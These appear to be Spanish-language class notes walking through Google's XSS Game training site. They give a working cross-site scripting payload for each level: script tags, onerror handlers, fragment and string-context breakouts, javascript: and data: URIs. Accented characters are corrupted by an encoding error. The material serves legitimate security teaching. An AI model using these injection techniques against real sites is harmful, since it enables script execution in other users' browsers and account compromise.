
https://xss-game.appspot.com/

# Level 1: Hello, world of XSS ------------------------------------------
<script>alert("Hola clase")</script>

# Level 2: Persistence is key ------------------------------------------
# Al igual que el nivel anterior, la vulnerabilidad de esta p치gina es incluir HTML directamente en la p치gina. Pero, esta vez hay una validaci칩n que nos impide usar la etiqueta script. Para evitarlo, podemos insertar una etiqueta de imagen con una URL no v치lida y un atributo onerror que ejecutar치 una alerta de javascript.

<img src=x onerror=alert("Hola otra vez")>


# Level 3: That sinking feeling...  --------------------------------------
# La aplicaci칩n elige la pesta침a de imagen en funci칩n del primer fragmento de URL (el hash despu칠s de la URL). 
# Al pasar un fragmento malintencionado que se insertar치 en la p치gina, se activar치 la alerta.

https://xss-game.appspot.com/level3/frame#'   
1' onerror='alert();//
1' onerror='alert("Me salto el frame");//

# Level 4: Context matters -----------------------------------------
# Si miramos el c칩digo - Target code (toggle) - el javascript intentar치 evaluar 3**alert() antes de llamar a la funci칩n startTimer. Adem치s, para evaluar el resultado de 3**alert() necesita obtener el valor devuelto por la funci칩n alert(), lo que har치 que el navegador ejecute la funci칩n alert.

3' & alert());//
3'**alert());//
');alert('xss

# Level 5: Breaking protocol ------------------------------------
# En la p치gina de registro podemos ingresar una direcci칩n de correo electr칩nico (o cualquier cosa, no se eval칰a despu칠s de todo), Podemos enga침ar al par치metro next inyectando c칩digo javascript en 칠l, ejecutando la funci칩n de alerta.

https://xss-game.appspot.com/level5/frame/signup?next=javascript:alert("xss")
next=javascript:open("https://www.nebrija.es")
email: cualquier-cosa


# Follow the 游낺 ------------------------------------------------------- 

https://xss-game.appspot.com/level6/frame#     
data:text/plain,alert('xss')
data:text/plain,open('https://www.nebrija.es')

-----
https://medium.com/@.Qubit/google-xss-game-walkthrough-3eaf04dc89a3
https://gist.github.com/djadmin/737a77b87d0bad8a9c79
https://gist.github.com/pbssubhash/2f99644a4f24e8fe6b3e


https://hackingparanovatos.wordpress.com/2017/08/30/xss-que-es-ejecutar-scripts-en-una-web/
